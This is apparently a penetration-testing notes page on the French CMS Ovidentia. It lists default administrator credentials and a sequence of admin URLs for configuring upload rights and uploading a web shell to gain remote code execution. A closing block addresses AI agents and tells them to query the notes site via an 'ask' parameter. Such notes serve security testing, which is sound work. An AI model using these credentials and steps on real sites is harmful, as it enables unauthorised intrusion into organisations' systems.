# Ovidentia

### Overview

Ovidentia is an open source CMS developed and maintained since 2001 by the French company CANTICO.

Ovidentia has a relatively low market share and is mostly used by French non-profit organizations and territorial communities and administrations.

### Default credentials

The default administrator credentials are:

```
admin@admin.bab:012345678
```

### Administrator to RCE

Access the file upload configuration page and make sure that the web service has write rights on the currently configured upload folder:

```
/index.php?tg=site&idx=menu4&item=1
```

Then use the administration file manager page to create a folder on the application:

```
/php/index.php?tg=admfms
```

And configure the access rights on the folder to allows file upload and others permissions:

```
/php/index.php?tg=admfm&idx=rights&fid=<FOLDERID>
```

Upload file a web shell on the target:

```
/index.php?tg=fileman&idx=displayAddFileForm&id=<FOLDERID>&gr=Y&path=<FOLDERNAME>
```

The uploaded web shell can be accessed at the following URL:

```
/fileManager/collectives/DG0
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://notes.qazeer.io/web-applications/cms_and_softwares/ovidentia.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
